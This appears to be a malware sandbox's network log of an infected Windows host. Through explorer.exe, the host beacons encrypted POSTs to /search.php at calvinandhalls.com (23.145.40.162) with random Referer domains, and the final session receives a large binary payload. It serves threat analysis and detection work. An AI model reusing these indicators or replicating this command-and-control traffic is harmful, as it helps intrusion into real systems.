2024-10-03 21:28:29 UTC	250	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6b 34 01 83 b7 25 93 3c 55 ab 27 8b bc b8 35 49 c3 12 63 b0 2e c8 f0 38 6e be 68 5a 31 bc c8 97 58 ff b2 04 02 8e b1 31 e1 24 33 e7 c0 4e 0b 25 01 21 0b d3 35 c7 d6 9d 3a d1 a5 22 62 4a b1 69 36 b0 34 1a c0 83 a0 9e 00 2d b5 75 cc 3f 8a 1a 49 99 3f 80 36 68 57 3c 4a ab e4 0c 99 93 78 c2 3e 27 d8 d7 a8 5b e6 e4 17 81 bd a5 a2 2f 24 c0 a8 a0 0d 16 81 0a 0c d7 34 6e 2e b2 57 2a 57 f3 43 32 4a de 93 da 19 30 dc f1 72 f3 3c 8b c7 a5 08 77 07 29 ba 5a 6e 17 35 27 f6 31 f0 d6 7c 42 03 4e 53 dc e9 23 4f 4c 55 b5 9d 9b 19 da a2 0c e0 53 9e d2 Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lk4%<U'5Ic.8nhZ1X1$3N%!5:"bJi64-u?I?6hW<Jx>'[/$4n.W*WC2J0r<w)Zn5'1\|BNS#OLUS
2024-10-03 21:28:29 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:29 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	50007	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:30 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://eycfcgwvugnqxe.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 215 Host: calvinandhalls.com
2024-10-03 21:28:30 UTC	215	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 68 34 01 83 b7 25 93 3c 5c f2 7f bc 9a a3 37 40 c4 2c 3b f7 42 c7 c3 2d 65 cf 15 2d 52 df ff e4 78 ce f1 6d 01 f5 e3 7a f6 70 59 b2 85 0a 1f 32 46 09 47 98 08 90 e7 91 59 d6 b3 6f 17 10 a0 0e 06 ad 72 57 e3 9b 93 91 40 0f 92 70 ed 7a ec 73 3f 9b 1e b4 32 31 7e 70 54 c9 ad 75 9a dc 12 ef 31 1c 9d bd c8 03 d8 ed 56 8f 92 ad b9 4c 41 8c d7 d5 0a 4e dd 66 39 89 66 4f 11 fc 72 73 57 d1 2b 02 18 93 b5 c0 28 3e 9a a6 65 88 4a fa ea fd 5f Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lh4%<\7@,;B-e-RxmzpY2FGYorW@pzs?21~pTu1VLANf9fOrsW+(>eJ_
2024-10-03 21:28:30 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:30 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	50008	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:31 UTC	290	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://uggcvdvmydqspblb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 183 Host: calvinandhalls.com
2024-10-03 21:28:31 UTC	183	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 69 34 01 83 b7 25 93 3c 7f ed 18 8f c5 b2 20 3b b5 2d 31 90 3f 9e ec 2b 02 fa 67 44 54 92 b7 ef 25 e0 db 03 6e ea a4 22 a2 5b 3a 98 ea 49 65 70 4b 20 40 d3 16 89 e4 b2 13 85 a8 5f 39 0d e4 18 59 b0 4f 52 90 99 f6 dc 4d 73 c2 73 c8 46 eb 67 72 cc 18 8d 3f 78 3b 04 59 ee b6 1e af b9 7b 95 43 62 ea cd d9 1f e5 80 61 ae 99 b4 be 5a 70 ce e0 Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Li4%< ;-1?+gDT%n"[:IepK @_9YORMssFgr?x;Y{CbaZp
2024-10-03 21:28:31 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:31 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	50009	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:32 UTC	286	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://ipavwsqiqelj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 358 Host: calvinandhalls.com
2024-10-03 21:28:32 UTC	358	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6e 34 01 83 b7 25 93 3c 67 ba 63 88 a5 d0 4e 14 b0 2f 1d 86 67 8f da 05 0d d2 12 2e 50 c3 d4 d5 59 f9 dc 4f 7f 8a e0 7b eb 7b 7e 89 d8 60 6c 54 5e 38 17 81 60 ac 88 c0 13 f1 82 65 6f 56 e8 19 55 c6 76 00 e9 e0 f4 ca 43 0f dc 75 e4 4b 9b 60 43 83 27 c1 62 48 26 78 14 dc da 05 87 bc 7c 8d 45 06 88 de d8 24 fd 9e 6f b5 90 e0 d7 36 3c c3 d2 c6 17 2f b8 1c 16 91 69 7a 4e bf 32 19 60 fb 23 18 39 c2 a0 ff 68 4b d1 ea 14 b8 27 e2 f3 a7 0b 3e 15 30 d5 57 3e 41 35 19 ce 2b fc ac 7e 58 10 54 43 d0 a1 25 59 49 16 bb 8a e5 36 e2 f4 3b 98 4f d6 a1 f0 87 58 b9 22 Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Ln4%<gcN/g.PYO{{~`lT^8`eoVUvCuK`C'bH&x\|E$o6</izN2`#9hK'>0W>A5+~XTC%YI6;OX"
2024-10-03 21:28:32 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:32 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	50010	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:33 UTC	286	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://bullivvhvmuc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 258 Host: calvinandhalls.com
2024-10-03 21:28:33 UTC	258	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6f 34 01 83 b7 25 93 3c 29 bd 60 94 9b c4 58 52 e9 2b 31 ef 33 fb c1 00 3e c4 0a 2d 71 c3 d5 fc 52 fc bf 7b 6c f1 a7 2e b6 6c 71 e5 e3 10 12 3f 71 4d 45 fa 10 c4 8e ce 27 d4 a9 7f 07 04 bc 7e 2a b5 4f 40 c4 9d 9d c5 0f 0d 90 1f a7 68 e6 79 57 d3 42 ca 71 4e 30 2e 7f f1 e7 10 95 b2 1a 98 2f 3b 84 e1 c7 12 cd eb 10 b6 d3 ff 94 2a 5f 8d d4 cf 7e 4c 99 72 33 ea 7f 4b 46 9a 4c 08 57 cd 3a 71 1a 80 dd ec 28 43 bf a4 66 a7 7d 93 c5 a7 77 33 7e 37 ae 4e 77 67 46 26 f4 58 84 aa 07 4c 10 54 5b e2 93 63 65 05 17 ad 8d dd 55 97 bc 34 eb 32 d5 82 c3 bc 7f b8 21 Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lo4%<)`XR+13>-qR{l.lq?qME'~O@hyWBqN0./;_~Lr3KFLW:q(Cf}w3~7NwgF&XLT[ceU42!
2024-10-03 21:28:33 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:33 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	50011	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:34 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://kheehglmstrxeo.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 213 Host: calvinandhalls.com
2024-10-03 21:28:34 UTC	213	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6c 34 01 83 b7 25 93 3c 6d bd 18 b6 94 cb 35 59 ad 23 7d 95 43 d2 c9 3b 62 a7 30 51 70 c1 d8 dc 7e aa a6 5a 71 fe bb 46 97 64 35 bb 9c 5a 7c 4b 6b 0d 56 f0 34 c3 e0 b2 5e d2 f5 70 14 5b 9b 0b 20 a0 35 65 95 e9 e0 b7 2e 06 bc 02 d8 4c bc 71 28 9c 50 ac 4f 34 57 2f 09 ee a2 0c e4 b2 6f c1 29 19 f5 fa 91 0a f0 82 46 86 ba ee bd 47 39 d7 85 af 50 2d 91 18 45 8e 07 66 00 bf 46 2e 7b ca 45 29 0e 84 ba d2 04 2f c6 e2 61 94 4a 99 90 Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Ll4%<m5Y#}C;b0Qp~ZqFd5Z\|KkV4^p[ 5e.Lq(PO4W/o)FG9P-EfF.{E)/aJ
2024-10-03 21:28:34 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:34 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	50012	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:35 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://jhcyskiuwnguyo.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 296 Host: calvinandhalls.com
2024-10-03 21:28:35 UTC	296	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6d 34 01 83 b7 25 93 3c 2d af 1f 80 da ad 57 30 ab 23 38 b0 66 9f e1 36 0f b0 6f 58 3a a1 c6 99 66 f1 b5 77 47 88 8d 76 ba 4e 5c e6 ea 64 74 7c 46 53 06 9c 05 9a c4 df 57 84 ef 3d 28 2b ab 7e 56 e1 56 6f ca d5 82 99 26 6c 93 7d da 36 bb 2f 37 83 3f 8c 3a 6a 62 01 50 ee cc 65 a3 be 16 f1 46 3f f1 d2 db 09 c6 a4 45 a0 d5 a9 d8 3a 7b c6 96 91 6e 3b ce 76 0f d6 17 6a 15 f5 75 73 7b f1 51 7c 0e f4 a2 9d 06 6c d4 e4 22 ad 7c ec d6 de 29 38 28 78 a2 08 2a 1d 4b 75 ec 2d fc 99 2c 3a 70 4b 18 9c a1 34 44 31 5c b2 82 e4 18 f6 dc 21 f5 46 84 8e e7 cd 5a db 7b Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lm4%<-W0#8f6oX:fwGvN\dt\|FSW=(+~VVo&l}6/7?:jbPeF?E:{n;vjus{Q\|l"\|)8(x*Ku-,:pK4D1\!FZ{
2024-10-03 21:28:35 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:35 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	50013	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:36 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://frkpgrboqqf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 155 Host: calvinandhalls.com
2024-10-03 21:28:36 UTC	155	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 62 34 01 83 b7 25 93 3c 46 ac 0f fe 87 e4 05 2f b9 2c 7c b5 7b fb d8 3f 11 ba 1d 28 2f c2 ee 93 34 c7 b9 07 17 8b f1 7c ba 3b 5e 95 ee 50 1c 4b 60 20 2f 8e 0b 80 f2 91 26 e1 fb 76 0e 56 bf 51 5f a2 71 50 88 c7 b3 d7 43 31 c0 04 bd 49 8f 7a 2b b1 32 a6 02 Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lb4%<F/,\|{?(/4\|;^PK` /&vVQ_qPC1Iz+2
2024-10-03 21:28:36 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:36 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	50014	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:37 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://atbscwbcvtybbp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 292 Host: calvinandhalls.com
2024-10-03 21:28:37 UTC	292	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 63 34 01 83 b7 25 93 3c 54 fc 06 ba a1 c4 11 4d f4 0b 63 a3 2b c1 f3 10 0c fc 0f 2b 20 da af 8d 36 cc d9 09 0d cf f3 5b 8a 2d 72 b2 90 15 6d 69 4f 2f 40 8e 0f 9d 8a b7 0f 98 e6 48 26 27 b2 7c 21 e4 70 60 d6 cd e1 98 5e 11 99 16 fe 6b fd 60 56 b9 06 ba 5c 4a 56 37 50 de cd 6d ad c4 73 85 56 69 ea c0 d5 3a c9 b1 76 9c 89 af dd 2e 36 cc d4 d2 49 57 d6 51 5b 98 2d 77 40 96 34 37 79 c3 5e 64 11 dc bd 8d 67 23 d5 e4 30 f4 23 f9 cc b8 11 32 63 20 df 05 7e 73 0b 06 e5 43 82 bb 36 23 28 73 4b 84 83 3c 7d 1c 37 c7 c8 e5 5c f8 c9 68 f2 76 d9 bb e4 d4 4a c0 29 Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lc4%<TMc++ 6[-rmiO/@H&'\|!p`^k`V\JV7PmsVi:v.6IWQ[-w@47y^dg#0#2c ~sC6#(sK<}7\hvJ)
2024-10-03 21:28:37 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:37 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	50015	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:38 UTC	287	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://odhashqreyopr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 151 Host: calvinandhalls.com
2024-10-03 21:28:38 UTC	151	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 60 34 01 83 b7 25 93 3c 50 bf 19 bd ca be 3d 16 eb 07 2d e0 56 9a f5 33 16 e0 0a 36 32 d3 cf fa 27 a0 c5 0f 12 ff 8b 69 b7 3d 73 8d 8b 73 00 2f 70 44 30 8c 3a a8 c8 a7 4d f1 fa 6f 07 30 93 0c 5f c6 29 60 cb f8 8c 80 13 09 c7 0f b9 22 e2 1f 13 Data Ascii: ryga8a-bDDuy(#%P g3iqH[@L`4%<P=-V362'i=ss/pD0:Mo0_)`"
2024-10-03 21:28:38 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:38 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	50016	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:39 UTC	287	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://tbgynejneafdk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 299 Host: calvinandhalls.com
2024-10-03 21:28:39 UTC	299	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 61 34 01 83 b7 25 93 3c 2a ed 76 e3 c6 fb 0c 4d f3 23 37 f2 47 c1 85 73 0b ca 10 38 62 dd be c7 31 c7 b1 62 11 c6 ef 25 e5 38 53 9b dd 5f 30 60 75 4c 5f 9b 1d d1 fd df 34 9d e2 63 16 0c a7 0d 3f b4 34 43 83 d9 82 d8 5d 2f 89 46 aa 52 fc 1f 37 82 02 bf 6a 45 3e 69 17 c6 cd 0f ec c9 18 e3 3f 25 c8 e3 97 5d f3 e5 77 a1 cb ec 83 3e 34 88 83 db 7b 47 aa 07 13 de 25 03 20 a7 60 21 6f fa 58 39 38 e7 c9 e8 3a 78 96 ea 06 fa 50 f1 df cb 18 32 27 76 cc 6c 6a 06 24 03 b5 35 8d 81 0c 27 12 66 39 87 82 6d 24 49 33 a5 c2 c4 33 c5 c7 78 df 5e bc ab fc 85 60 99 40 Data Ascii: ryga8a-bDDuy(#%P g3iqH[@La4%<*vM#7Gs8b1b%8S_0`uL_4c?4C]/FR7jE>i?%]w>4{G% `!oX98:xP2'vlj$5'f9m$I33x^`@
2024-10-03 21:28:39 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 21:28:39 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	50017	23.145.40.162	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 21:28:40 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://mqhahmibwlnntq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 283 Host: calvinandhalls.com
2024-10-03 21:28:40 UTC	283	OUT	Data Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 66 34 01 83 b7 25 93 3c 71 f8 35 95 c6 e5 20 5c a3 70 61 84 72 d6 ca 16 2d b1 39 07 6c c4 c6 83 7f fe a0 05 42 9a 8a 53 f6 4a 5c bc 94 1c 7a 41 5a 05 24 e2 3b b6 91 c5 22 f8 87 57 1f 35 af 0e 19 cd 69 10 8d fa a1 b9 13 7e a2 0e e2 2b b6 01 3c a4 1d 8b 55 50 36 13 14 b8 de 40 9e a8 6d 89 28 01 c4 a7 91 3b ab 81 4e be be 8a 9d 1a 5f a0 b8 ac 0b 5c d1 75 12 f0 2c 04 46 a5 4a 7e 2a e7 2d 2d 28 e5 c0 9a 67 4c ae ac 64 f7 38 e7 a0 d5 27 29 1f 34 f3 4f 12 02 0e 23 f4 1c e1 ce 14 23 6e 5e 03 d5 88 44 66 1c 33 dd 80 cf 47 c8 f4 11 c1 54 be a0 ae c6 05 b9 43 Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lf4%<q5 \par-9lBSJ\zAZ$;"W5i~+<UP6@m(;N_\u,FJ~*--(gLd8')4O##n^Df3GTC
2024-10-03 21:28:40 UTC	294	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 21:28:40 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Type: text/html; charset=utf-8 Connection: close Transfer-Encoding: chunked
2024-10-03 21:28:40 UTC	7898	IN	Data Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 88 8a 82 ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07 Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju\|n'\|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU44A:F=
2024-10-03 21:28:40 UTC	19	IN	Data Raw: 1a 58 b2 14 d1 ff ef 1b ab d4 44 9e af 19 24 1b 3c de a6 Data Ascii: XD$<
2024-10-03 21:28:40 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-10-03 21:28:40 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4 Data Ascii: 2000O{[/Iu@Qp3TsEsp\|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
2024-10-03 21:28:40 UTC	6	IN	Data Raw: 4e 13 8c ae b0 c6 Data Ascii: N
2024-10-03 21:28:40 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
